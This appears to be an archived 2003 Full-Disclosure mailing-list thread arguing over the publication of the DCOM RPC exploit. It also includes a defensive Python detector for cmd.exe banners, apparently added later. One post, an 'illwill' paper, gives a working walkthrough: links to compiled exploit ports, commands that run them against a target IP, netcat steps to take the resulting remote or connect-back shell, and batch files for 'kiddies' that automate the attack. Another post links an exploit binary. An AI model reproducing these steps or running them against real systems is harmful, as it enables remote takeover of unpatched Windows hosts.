Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread morning_wood
umm i dont have office installed, so there is no spellcheck in OE. And ever
consider i may have a crap keyboard and one hand..??? or mby i just dont
care hou goud i speal mmmkay...
oh.. everone hates me... ROFL...

w00d

- Original Message - 
From: "Shanphen Dawa" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 10:46 PM
Subject: Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> This childish flaming is why everyone wishes death upon you donnie,
> please get a clue.
>
> There are more constructive ways to make a point, please try your best to
> try them. You might be surprised how much less hated you might become around
> here.
>
> -Shanphen
>
> Oh yeah, please do try the tools drop down menu in hotmail, there is a
> selection called "Spell Check." As for the grammar, I guess you might just
> have to proofread before you click send. It would also help towards your
> "credibility".
>
> On Sat, 26 Jul 2003 20:03:02 -0700
> "morning_wood" <[EMAIL PROTECTED]> wrote:
>
> > please stop whining and try having a nice cup of STFU.  Too bad, mby "big
> > vendors" need to start hiring exploit developers to test their products
> > before releasing them. Last i checked, the internet at large is a free
> > market, open to the benefits and pitfalls of any other marketplace.
> >
> > How was that cup of STFU???  need sum sugar?
> >
> > morning_wood
> > http://nothackers.org/about.php
> >
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] RE: DCOM RPC exploit

2003-07-26 Thread Steve W. Manzuik
Hi Chris.

Funny you post this from your NGS Software account.  Does Sapphire/Slapper
ring a bell?  Isn't this a bit of the pot calling the kettle black?

Do you really think for one second that HD Moore, Benjurry, and FlashSky are
the only people capable of coming up with exploit code for this?  The day it
was announced I saw two other exploits that haven't been publicly
announced.  The community of people who have the skills to write such a worm
already had the exploit code, or at the very minimum enough information to
replicate it the day this was released.

A worm exploiting this might happen, but is it really that big of a deal?

> Message: 13
> Date: Sat, 26 Jul 2003 20:16:24 -0400 (Eastern Daylight Time)
> From: Chris Paget <[EMAIL PROTECTED]>
> To: "[EMAIL PROTECTED]" 
> <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] DCOM RPC exploit  (dcom.c)
> 
> 
> 
> 
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> virtually no work to do in order to write a worm that exploits this.
> 
> 
> 
> Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> full-disclosure list, but working exploit code for an issue this huge is taking
> it a bit far, especially less than 2 weeks after the advisory comes out.
> 
> Cheers, fellas.  When the worm comes out, I'll be thinking of you.
> 
> Chris




Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Nick FitzGerald
"gregh" <[EMAIL PROTECTED]> wrote:

> Just my $0.02:
> 
> Shoot the messenger - that always stops the bad event happening.
> 
> Sorry for the sarcasm. I can never see the point in "If we don't tell
> the enemy how to build a nuclear weapon they never will so we are
> safer as a result" logic. 

The logic is not that you are ultimately "safer" in the sense that 
potential "adversaries" will be _prevented forever_ from developing 
"something bad" to use against you based on this "knowledge".

The argument is that you will be probabilistically safer for a longer 
time.  If you don't give kitset weapons, or the detailed plans of how 
to make them, to all and sundry then the number of potential 
adversaries who can use that type of weapon against you is _reduced_.  
Thus, probabilistically, over many iterations of such new weapon 
possibilities and designs, it is longer on average before any one of 
these weapons whose availability has been "boosted" is used against you 
_relative to those cases where the possibilities and plans are not 
disclosed_.

Thus, not disclosing such information is part of managing the risk 
associated with a vulnerability.

That is not to say "you can get right royally shagged via DCOM over RPC 
so apply this patch now" is not valuable information of the sort that 
should not be disclosed.  However, publishing exploit code for the 
kudos of the "my willy is bigger than yours" kind, which typically is 
the only "benefit" accruing to the discloser, is somewhere between 
narcissistic bloody mindedness and outright criminal.

(At the risk of strolling even further off topic, the first point 
reminds me of something the proponents of "give us the sploits" often 
trundle out -- convincing those managers who "won't believe X is 
possible until they see it with their own eyes".  Of course, selling 
"real security" to such folk is much like being tailor to that mythical 
emperor, so availability of sploits should not be necessary at all, as 
essentially the problem in such instances reduces to one or other of, 
"will I spoil my professional reputation by being hamstrung into 
implementing half-arsed solutions because this guy has half of a 
baboon's brain" _or_ to that of a marketing problem where the "art" is 
in deciding how to tell them any old crap so long as it is wrapped up 
in enough techno-gibberese that they think they half understand what 
you are talking about.)

> Greg - you may call me a "Jihad O'Clue." if you wish.

I may, but as you're inviting name-calling, I think I am rather more 
likely to call you a silly twat that uses some chronically lame HTML 
Email client that has no place in the working armory of a security 
professional, at least not if its trivial configuration options that 
disable the sending of HTML Email are not disabled.


Regards,

Nick FitzGerald



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Chris Paget

Comments inline.


On Sun, 27 Jul 2003, Jason wrote:

> The war begins...

I hope so.  Discussion of the hows and why's and morals of security and
disclosure is *always* a good thing - which was partly why I made the original
post.

> I'm not going to debate the release of code with anyone. Simply put,
> best practices should have mitigated this in a huge way from the
> beginning. All of the remaining threat should have been tested and
> patched by now.

In an ideal world, everyone would be patched by now.  The problem is, this is
not an ideal world, most people will still be unpatched.  As for best practices
- have you ever tried disabling RPC?  It's not actually possible - in fact,
WinXP and 2003 will automatically reboot if RPC stops.  As for DCOM - the
setting to disable it is a suggestion only, and applications can and will
re-enable it whenever they use it, or else they'll just plain break.  So which
"best practices" are you talking about?  Are you planning to install a separate
firewall for every machine?  If so, maybe I should buy some stock in Zone Labs
or ISS...!

> > Scanners are good; I agree they give out more information than an advisory, but
> > it's still a step away from giving the kiddies a tool.  Those in the know will
> > always be able to write an exploit from minimal details; whether or not the
> > pre-pubescent h4xx0rs get hold of it is another matter though.
>
> I would rather have a pre-pubescent cracker knocking on the door with a
> published sploit that I was forced to patch against any day when
> compared to the 1337 h4x0r w17h 4 g04l and the funding to achieve it.

But you'd still patch either way, right?  So we're talking about the difference
between a knowledgeable, determined attacker (who can never be kept out) and a
skript kiddie with a tool, who is just an annoyance.  But because of the
exploit code, he's now a skript kiddie with a ten-thousand-node DDoS network at
his disposal, who can (and probably will) DDoS anyone, anywhere, and there's
nothing you can do to prevent it (short of getting very friendly with your
upstream provider).

> ** Far too many people wait to patch until there is "published" exploit
> code. **

I agree - there's far too many people who wait.  But what about all the millions
of home users who don't even know what a security patch *IS*, let alone how to
find them?  Most people buy a computer, stick it on the net, and expect it to
work.  They don't expect to be downloading updates every week.

> ** If you have assets worth protecting you hire people who are capable
> of protecting them. **

The organisation concerned has hired many people who are perfectly capable of
protecting their assets.  The problem is, they're concerned about the business
as well - and given Microsoft's track history with patches, I can understand
their not wanting to install every patch on every mission-critical server the
moment it is released.  Allowing people to work is the primary goal of every
server; security HAS to come second to that.

> * How many of the systems in your typical multinational organization
> require the use of DCOM? ( slim to none? )

Agreed - very few, if any.

> * How many of the systems that require DCOM need rpc exposed to
> everyone? ( slim to none? )

Also agreed.  But how many organisations firewall off internal servers from
internal users (slim to none).  Bad practice, I'll agree, but expensive to
implement if you choose to do it.

> * How many of the systems exposed to everyone have weak administrative
> passwords? ( nearly all? )

Define "weak".  If you mean "guessable within a week", I'd expect it to be
very few.  If you mean "crackable from a copy of the SAM by an attacker with
average resources before the password expires", probably most - especially given
the recent advances in hash chaining techniques.

> * How many of the systems vulnerable internally would have been
> protected by an IPS if it had a way of protecting? ( slim to none? )
>
> * How many of the systems vulnerable internally are protected with an
> IDS? ( slim to none? )

Detection and prevention is easier than you might think.  The moment that an IDS
detects the string "Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright
1985-2000 Microsoft Corp." in a network packet, it's a fair bet that it's as the
result of an exploit.  Block the connection, block the IP.

As for how many are protected - not enough, which is again a cost issue.  You
ever looked at the price of an ISS RealSecure sensor?  And then multiplied that
by a thousand to cover all your servers?  Besides - how many system
administrators have the time to watch the IDS given the number of patches they
have to install on all their servers?

> * How many of the systems vulnerable from the internet are implemented
> and administered by an MCSE or equivalent? ( nearly all? )

Agreed.  But I think many people on this list would agree that an exam you can
pass after reading a book the night before is not worth much.
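
An added example, not part of Chris Paget's post or anything in the thread, of the detection idea he describes above: a cmd.exe banner such as "Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp." has no business appearing in a TCP payload, so an IDS can alert on it and block the source. The code generalises the check to any Windows 2000/XP build (the XP banner "Microsoft Windows XP [Version 5.1.2600]" is quoted later in this thread) and keeps a small per-flow buffer so the two banner lines are still matched when they arrive in separate segments. All addresses, ports and payloads in it are constructed samples, not captured traffic.

```python
"""Spotting a cmd.exe banner in network traffic.

Added example, not from the original thread.  Chris Paget's point is that the
string "Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000
Microsoft Corp." inside a packet almost always means a shell was just spawned
for a remote attacker.  This generalises the check to any Windows 2000/XP
build and reassembles per-flow data so a banner split across two TCP segments
is still caught.  All packet payloads below are constructed samples.
"""
import re
from typing import Dict, List, Optional, Tuple

Endpoint = Tuple[str, int]           # (ip, port)
FlowKey = Tuple[Endpoint, Endpoint]  # (src, dst); direction matters

# cmd.exe prints two lines at start-up separated by CRLF; \s* tolerates the
# line break however it is fragmented.  Group 1 = build, group 2 = (C) year.
CMD_BANNER_RE = re.compile(
    rb"Microsoft Windows (?:2000|XP) \[Version (\d+\.\d+\.\d+)\]\s*"
    rb"\(C\) Copyright 1985-(\d{4}) Microsoft Corp\."
)


def find_shell_banner(payload: bytes) -> Optional[Tuple[str, int]]:
    """Return (version, copyright_year) if a cmd.exe banner is present, else None."""
    m = CMD_BANNER_RE.search(payload)
    if m is None:
        return None
    return m.group(1).decode("ascii"), int(m.group(2))


class BannerDetector:
    """Per-flow sliding buffer so the banner is found even when fragmented."""

    def __init__(self, window: int = 512):
        self.window = window                      # bytes retained per flow
        self.buffers: Dict[FlowKey, bytes] = {}
        self.alerted: Dict[FlowKey, Tuple[str, int]] = {}

    def feed(self, src: Endpoint, dst: Endpoint, data: bytes) -> Optional[Tuple[str, int]]:
        """Feed one TCP segment; return the banner hit the first time a flow matches."""
        key = (src, dst)
        buf = (self.buffers.get(key, b"") + data)[-self.window:]
        self.buffers[key] = buf
        if key in self.alerted:
            return None                           # one alert per flow is enough
        hit = find_shell_banner(buf)
        if hit is not None:
            self.alerted[key] = hit
        return hit


# Constructed sample traffic (not a real capture).  Ports are arbitrary.
SAMPLE_SEGMENTS: List[Tuple[Endpoint, Endpoint, bytes]] = [
    # ordinary HTTP response mentioning Windows 2000: must not alert
    (("10.0.0.5", 80), ("10.0.0.9", 3412),
     b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n\r\n<html>Windows 2000</html>"),
    # bind shell on a Windows 2000 host, banner split across two segments
    (("10.0.0.7", 2000), ("10.0.0.9", 1030),
     b"Microsoft Windows 2000 [Version 5.00.2195]\r\n"),
    (("10.0.0.7", 2000), ("10.0.0.9", 1030),
     b"(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\WINNT\\system32>"),
    # the attacker typing a command back: reverse direction, no alert
    (("10.0.0.9", 1030), ("10.0.0.7", 2000), b"dir\r\n"),
    # Windows XP shell, banner arriving whole
    (("10.0.0.8", 2000), ("10.0.0.9", 1031),
     b"Microsoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n"),
]


def scan_segments(segments) -> List[Tuple[FlowKey, Tuple[str, int]]]:
    """Run the detector over (src, dst, payload) triples and return the alerts."""
    det = BannerDetector()
    alerts = []
    for src, dst, data in segments:
        hit = det.feed(src, dst, data)
        if hit is not None:
            alerts.append(((src, dst), hit))
    return alerts


if __name__ == "__main__":
    for (src, dst), (ver, year) in scan_segments(SAMPLE_SEGMENTS):
        print(f"ALERT shell banner {src[0]}:{src[1]} -> {dst[0]}:{dst[1]} "
              f"(Windows build {ver}, (C) 1985-{year}); block {src[0]}")
```

The flow key is directional on purpose: the banner travels from the compromised host to the attacker, so the source of the matching segment is the machine to isolate. A real sensor would key on the full 4-tuple and expire idle buffers; the sliding window here is only so the check stays cheap per segment.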

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Valdis . Kletnieks
On Sat, 26 Jul 2003 22:29:56 CDT, Ron DuFresne said:
> I'm just trying to understand how corporate networks would/should be at
> risk with this, why port 135 would not be filtered already limiting
> exposure.  Is there a reason why it would not be that I'm missing?  The

It's the rare corporate net indeed that doesn't have a single remotely
exploitable copy of IE or Outlook left in its entire address space.

And Slammer proved quite well that having a firewall doesn't stop squat.




Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Jason
The war begins...

I'm not going to debate the release of code with anyone. Simply put, 
best practices should have mitigated this in a huge way from the 
beginning. All of the remaining threat should have been tested and 
patched by now.

Now to the points you make.

Chris Paget wrote:
> Len,
>
> IMHO there's a difference between "security through obscurity" and posting
> working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
> over a range of RPC mechanisms (primarily 135/tcp) is all that most
> administrators need to know.  It's one thing knowing that you can kill a person
> with a gun, and it's another to give away firearms.

RPC services have been a risk forever. Knowing that the majority of 
clients do not use DCOM, an RPC service, is all that the administrators 
needed to know. Do you build a *nix system and leave all(any) RPC 
services enabled?

** DCOM should have been disabled for 99% of the systems they have. **

> Scanners are good; I agree they give out more information than an advisory, but
> it's still a step away from giving the kiddies a tool.  Those in the know will
> always be able to write an exploit from minimal details; whether or not the
> pre-pubescent h4xx0rs get hold of it is another matter though.

I would rather have a pre-pubescent cracker knocking on the door with a 
published sploit that I was forced to patch against any day when 
compared to the 1337 h4x0r w17h 4 g04l and the funding to achieve it.

Ohhh, now we are going to complain about having to put in all those 
extra hours and spend all that overtime money. Umm, be happy you still 
have a job.

** Far too many people wait to patch until there is "published" exploit 
code. **

> Different people will have differing opinions on how much information and what
> kind of disclosure policy is acceptable; for me, working exploit code so soon
> after the advisory is just irresponsible.

Jihad, count me out.

> As for the <2 week "grace period", it's not enough.  What if the patch is
> broken in some way?  It was rushed out the door by Microsoft; how many admins
> wait a month before applying a patch, just to see if anyone else has problems
> with it?  I've just finished an audit on a multinational manufacturing company;
> the exploit code came out before they'd patched.  How many other companies are
> in the same boat?

Sorry, no sympathy here.

** If you have assets worth protecting you hire people who are capable 
of protecting them. **

Here are some parting questions:

* How many of the systems in your typical multinational organization 
require the use of DCOM? ( slim to none? )

* How many of the systems that require DCOM need rpc exposed to 
everyone? ( slim to none? )

* How many of the systems exposed to everyone have weak administrative 
passwords? ( nearly all? )

* How many of the systems vulnerable internally would have been 
protected by an IPS if it had a way of protecting? ( slim to none? )

* How many of the systems vulnerable internally are protected with an 
IDS? ( slim to none? )

* How many of the systems vulnerable from the internet are implemented 
and administered by an MCSE or equivalent? ( nearly all? )

> I agree, exploit code may force people to patch, but that's not sufficient
> justification in my book.
>
> Chris

And some random thoughts.

* I am still a firm believer in the ability of the human race to learn 
by making mistakes. ( it can be fun )

* I do not believe that those mistakes need not remove you from the 
human race. ( it should be fun if it does )

* I like beer! 1 l0v3 s3x!

* These are my opinions and not those of my employer.

* It is like shock and awe all over again... ONLY IT IS BETTER AND 
JUSTIFIED!!!

* I have a clue stick, need a whack?



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Paul Schmehl
On Sat, 2003-07-26 at 22:29, Ron DuFresne wrote:
> 
> I'm just trying to understand how corporate networks would/should be at
> risk with this, why port 135 would not be filtered already limiting
> exposure.  Is there a reason why it would not be that I'm missing?

Are you really serious?  Recall Slammer?  There were networks that were
locked down pretty tight.  Slammer couldn't get in, right?  Then one
developer who got his unpatched copy of SQL inside the network, by
logging in through VPN with his infected laptop, took the entire network
down.

You can't get in to our network on those ports either - unless you're
already in.  But I can guarantee you that we'll be chasing infected
boxes down for days after the worm hits.  And we've already patched
everything that we could patch.  I scan for Slammer every week, because
every week someone new decides to install SQL unpatched or some stupid
app that has an unpatched copy of MSDE.  Now I'll be chasing the RPC
worm around too.

You can't firewall 135 inside your network or you'd have no network.

The only reason I read lists like this is because I need to know before
it hits what the next stupid exploit is that I have to deal with.  And
every one is a royal PITA.  I put virus and worm writers right there in
the same pile with spammers.  They're all the scum of the earth.  Clear
examples of the worst of human nature.

-- 
Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Shanphen Dawa
This childish flaming is why everyone wishes death upon you donnie, please get a clue.

There are more constructive ways to make a point, please try your best to try them. 
You might be surprised how much less hated you might become around here.

-Shanphen

Oh yeah, please do try the tools drop down menu in hotmail, there is a selection 
called "Spell Check." As for the grammar, I guess you might just have to proofread 
before you click send. It would also help towards your "credibility".

On Sat, 26 Jul 2003 20:03:02 -0700
"morning_wood" <[EMAIL PROTECTED]> wrote:

> please stop whining and try having a nice cup of STFU.  Too bad, mby "big
> vendors" need to start hiring exploit developers to test their products
> before releasing them. Last i checked, the internet at large is a free
> market, open to the benefits and pitfalls of any other marketplace.
> 
> How was that cup of STFU???  need sum sugar?
> 
> morning_wood
> http://nothackers.org/about.php
> 


Re: [Full-Disclosure] morning_wood should stop posting xss vulns insites and fix his own site.

2003-07-26 Thread [EMAIL PROTECTED]
> my site is my site, why are you telling me to "fix" it? I knew it's 404
> has xss before any of you did.
> Whats the big deal what my site has or hasnt... hmm? If you dont like my
> stuff, dont read it, my name is on every one of my posts.. ever hear of
> filter? I dont read several advisories here based on title alone.. am i
> missing out? mby, mby not.. are you? XSS is a security issue plain and
> simple, and "my site" can have or have not whatever i please, i suggest
> not visiting then, hell.. why are you even bothering to visit if you
> dont like.. 

Donnie, the point is that if you complain, don't make the same mistake. 
You're a hypocrite to call XSS a security issue, and then (knowingly) make
the same error.  It's not that hard to write a simple fix to filter your
input.  Basic JavaScript, Donnie, basic JavaScript.  If XSS is a security
issue, and the entire thesis of your so-called security list is that
security issues should be dealt with, instead of hidden -- as has been your
complaint before -- then you should leave that list now.  Knowingly
introducing vulnerabilities, and then not fixing them when several people
(myself included) have noted it to you.




Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread christopher neitzert
Hicks,

I am concerned that you construed my remark as going after F-D, I read
F-D for the commentary as I find it educational and entertaining at the
same time.

Pure-evil, in this case is not necessarily bad. 

Perhaps I should have been more verbose;

I'm particularly happy that this exploit has been published as i hope it
will motivate Microsoft to fix the problems with their McOS. 

What's evil, or beautiful, about it (depending on how you look at it) is
that it works very nicely on an XP box hardened to NSA-SNAC
Specification regarding secure RPC.  

My hat is off to FlashSky, Benjurry, and H D Moore, keep up the great
work! 


chris



On Sat, 2003-07-26 at 23:45, hicks wrote:
> this was on a website before it was published on full disclosure btw, it came
> out today and that was that. no need to go after full disclosure, btw it was
> on french bugtraq soon after being published and then made its way on here.
> why be on full-disclosure if you say it's bad or pure evil.. It's well written
> and has a few bugs but it's nice code IMHO, what do you expect after the vuln
> releases
> 
> 
> - Original Message - 
> From: "christopher neitzert" <[EMAIL PROTECTED]>
> To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
> Sent: Saturday, July 26, 2003 6:19 PM
> Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)





Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread hicks
this was on a website before it was published on full disclosure btw, it came
out today and that was that. no need to go after full disclosure, btw it was
on french bugtraq soon after being published and then made its way on here.
why be on full-disclosure if you say it's bad or pure evil.. It's well written
and has a few bugs but it's nice code IMHO, what do you expect after the vuln
releases


- Original Message - 
From: "christopher neitzert" <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 6:19 PM
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)




[Full-Disclosure] dcom-win32

2003-07-26 Thread exceed
hi kiddies,

original dcom exploit posted by HD Moore compiled with cygwin: 

http://users.volja.net/exceed/dcom-win32.zip 



Re: [Full-Disclosure] DCOM RPC exploit

2003-07-26 Thread w g
DCOM RPC exploit paper
7/26/03
by: illwill <[EMAIL PROTECTED]>
http://illmob.org/rpc/

There are 2 dcom Win32 ported versions available:

Ben Lauziere  [EMAIL PROTECTED]   http://illmob.org/rpc/DComExpl_UnixWin32.zip
"exceed"      [EMAIL PROTECTED]   http://illmob.org/rpc/dcom-win32.zip

for my example ill be using ben's version cuz it doesnt use a cygwin.dll

how to use the Dcom32.exe ported for win32 boxes:

c:\> dcom32.exe target remote-ip   (ex. C:\> dcom32.exe 2 192.168.0.2)

if all goes well you should get a shell on port  to connect to. fire up netcat:

c:\> nc -vvv VicIP Port

(ex.  c:\> nc 192.168.0.2 
      JackedXP [192.168.0.2]  open
      Microsoft Windows XP [Version 5.1.2600]
      C:\WINDOWS\system32>)

BAM!!! You got a command prompt access to the victim box!!

easy kiddie bat for dcom32 from morning_wood (rpcx.bat):

@echo on
@echo easy kiddi .bat by [EMAIL PROTECTED]
@echo useage is "target remote-ip"
@echo target is 1-6 where
@echo -  0 Windows 2000 SP0 (english)
@echo -  1 Windows 2000 SP1 (english)
@echo -  2 Windows 2000 SP2 (english)
@echo -  3 Windows 2000 SP3 (english)
@echo -  4 Windows 2000 SP4 (english)
@echo -  5 Windows XP SP0 (english)
@echo -  6 Windows XP SP1 (english)
pause
dcom32 %1 %2
nc -vvv %2 

commandline for it would be rpcx.bat target remote-ip  (ex. rpcx 2 192.168.0.2)



how to use the root32 exploit (which i found to work like shit.)

first open a receiving netcat connection on your own computer using the command line:

nc -l -v -p 1199   (1199 can be any port you desire)

then use the command line for root32.exe:

root32.exe 172.0.15.29   64.252.136.135   1199       2
           ^remoteIP     ^yourIP          ^yourPORT  ^vic service pack

if all goes well you should receive a commandline connect-back prompt through netcat to the vulnerable box.

morning_wood's quick n grimy bat file Root.bat:

root32 %1 %2 %3 2
nc -vv %1 %3

peace out. illwill
http://illmob.org

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread gregh



 
- Original Message - 
From: Chris Paget
To: Len Rose
Cc: [EMAIL PROTECTED]
Sent: Sunday, July 27, 2003 12:08 PM
Subject: Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

> Len,
>
> IMHO there's a difference between "security through obscurity" and posting
> working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
> over a range of RPC mechanisms (primarily 135/tcp) is all that most
> administrators need to know.  It's one thing knowing that you can kill a person
> with a gun, and it's another to give away firearms.

Just my $0.02:

Shoot the messenger - that always stops the bad event happening.

Sorry for the sarcasm. I can never see the point in "If we don't tell the enemy
how to build a nuclear weapon they never will so we are safer as a result" logic.

Greg - you may call me a "Jihad O'Clue." if you wish.


[Full-Disclosure] Interesting Site: PuRe's Escape

2003-07-26 Thread PuRe
Hello Full Disclosure List Users:

Your Friend PuRe considered our site PuRe's Escape interesting and wanted to send it 
to you.


Site Name: PuRe's Escape
Open-Source for an Open-Community, Taking You To The Next Level.
Site URL: www.pureescape.net



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread dhtml



From: "Chris Paget" <[EMAIL PROTECTED]>
>
> 
>
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing
this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers
have got
> virtually no work to do in order to write a worm that exploits this.
>
> 
>
> Personally, I'm tempted to set up my firewall to NAT incoming requests
on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is
the
> full-disclosure list, but working exploit code for an issue this huge
is taking
> it a bit far, especially less than 2 weeks after the advisory comes
out.
>
> Cheers, fellas.  When the worm comes out, I'll be thinking of you.
>
> Chris


This shall be taken as the official stance of your employer ngssoftware.com
from whence you post. Otherwise the standard disclaimer would apply.

Or perhaps you are just new there after the spotlight of the "shatter
attack" dimmed down.







Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Ron DuFresne

>
> Len,
>
> IMHO there's a difference between "security through obscurity" and posting
> working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
> over a range of RPC mechanisms (primarily 135/tcp) is all that most
> administrators need to know.  It's one thing knowing that you can kill a person
> with a gun, and it's another to give away firearms.
>

[SNIP]


I'm just trying to understand how corporate networks would/should be at
risk with this, why port 135 would not be filtered already limiting
exposure.  Is there a reason why it would not be that I'm missing?  The
main exposure seems to be the home users not aware of why certain services
and ports should be properly configured and/or filtered.  The gartner
group seems to have come to this conclusion, one of their better
statements in the recent past:



SECURITY WIRE DIGEST, VOL. 5, NO. 55, JULY 24, 2003
...
*GARTNER URGES PERSONAL FIREWALLS FOR MICROSOFT FLAWS
Research firm Gartner Group is urging corporations to consider using
personal firewalls on all desktop and notebook computers connected to
networks to hedge against the steady stream of Microsoft vulnerabilities.

Gartner says applying all the necessary patches to address the dozen
"critical" alerts that Microsoft released between January and June would
take most enterprises at least six months. "And more desktop
vulnerabilities will be discovered in the near future," says Gartner VP
John Pescatore.

While implementing and maintaining personal firewalls will amount to a
substantial cost of as much as $150 per machine, Pescatore says they will
help protect individual devices--particularly those used by remote
workers--from the type of executable attacks that are becoming more
popular.

Pescatore says the Internet Connection Firewall built into Windows XP
isn't sufficient protection because it blocks only incoming connections.
Enterprise firewalls should also be outfitted with URL blocking products
that filter out URLs known to be sources of attacks.
http://www3.gartner.com/resources/116100/116197/116197.pdf


It seems more and more folks in the industry are coming to the conclusion
that maintaining patched systems is an overwhelming job, and that the best
mitigation is filtering at the gateway in the various forms that can be
accomplished.  This still leaves the average home user in a rut, since
most lack the basic knowledge of the consequences of not filtering out the
nasty cruft from the benign, let alone the skills to recognise such.  It
would be nice to see other vendors step up to Dell's recent announcement
to start shipping systems with a more secure 'default' install, and
perhaps find a way to expand upon that by shipping systems with a personal
firewalling system capable of providing a safer networking setup out of
the box for joe average websurfer.  Until the environment changes as
regards those vendors releasing code/applications/OS', then the best we
have at present is those vendors shipping the systems to the endusers.

Thanks,

Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Blue Boar
Chris Paget wrote:

I know this is the
full-disclosure list, but working exploit code for an issue this huge is taking
it a bit far, especially less than 2 weeks after the advisory comes out.
I'm aware of at least 7 exploits for this vuln now.  Are you really going 
to complain that you get to see the source for one of them?  If so, that's 
easy enough to fix, just delete the file from your drive.  Yes, this 
exploit will almost certainly be turned into a worm.  I for one would 
rather see the exploit that will be the worm ahead of time, makes it easier 
for everyone to prepare.

		BB

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread morning_wood
please stop whining and try having a nice cup of STFU.  Too bad, mby "big
vendors" need to start hiring exploit developers to test thier products
before releasing them. Last i checked, the internet at large is a free
maket, open to the benifits and pitfalls any other marketplace.

How was that cup of STFU???  need sum sugar?

morning_wood
http://nothackers.org/about.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Elvar
Thanks a lot Paul, that compiled fine now. I have yet to see this exploit
actually work though. I've tested it on multiple 2k/xp machines with all
different service packs and it never seems to affect them.

Regards,
Elvar


- Original Message - 
From: "Paul M. Hirsch" <[EMAIL PROTECTED]>
To: "Elvar" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 8:38 PM
Subject: Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> On Sat, Jul 26, 2003 at 07:34:17PM -0500, Elvar wrote:
> > Anyone gotten this to compile in FreeBSD 4.8-stable?
> >
> > <[EMAIL PROTECTED]:elvar>gcc -o dcom dcom.c
> > dcom.c:25: error.h: No such file or directory
>
> Change line 10 to:
>
> #include 
>
> Compiles fine on OpenBSD-current/i386.  It failed to exploit
> my W2Ksp3 and XPsp1 boxes/victims.
>
> -Paul
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Chris Paget

Len,

IMHO there's a difference between "security through obscurity" and posting
working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
over a range of RPC mechanisms (primarily 135/tcp) is all that most
administrators need to know.  It's one thing knowing that you can kill a person
with a gun, and it's another to give away firearms.

Scanners are good; I agree they give out more information than an advisory, but
it's still a step away from giving the kiddies a tool.  Those in the know will
always be able to write an exploit from minimal details; whether or not the
pre-pubescent h4xx0rs get hold of it is another matter though.

Different people will have differing opinions on how much information and what
kind of disclosure policy is acceptable; for me, working exploit code so soon
after the advisory is just irresponsible.

As for the <2 week "grace period", it's not enough.  What if the patch is
broken in some way?  It was rushed out the door by Microsoft; how many admins
wait a month before applying a patch, just to see if anyone else has problems
with it?  I've just finished an audit on a multinational manufacturing company;
the exploit code came out before they'd patched.  How many other companies are
in the same boat?

I agree, exploit code may force people to patch, but that's not sufficient
justification in my book.

Chris




On Sat, 26 Jul 2003, Len Rose wrote:

> Disclaimer: I'm not supposed to have an opinion about anything
> other than how the list functions but I'm weak and unable to
> resist this one.
>
> Hi Chris,
>
> I don't feel that your position is valid. Once the vulnerability was
> announced then it was inevitable. I'm surprised that you feel that
> security by obscurity is a valid stance. Even those who have released
> "harmless" scanners have in fact aided those who would be writing such
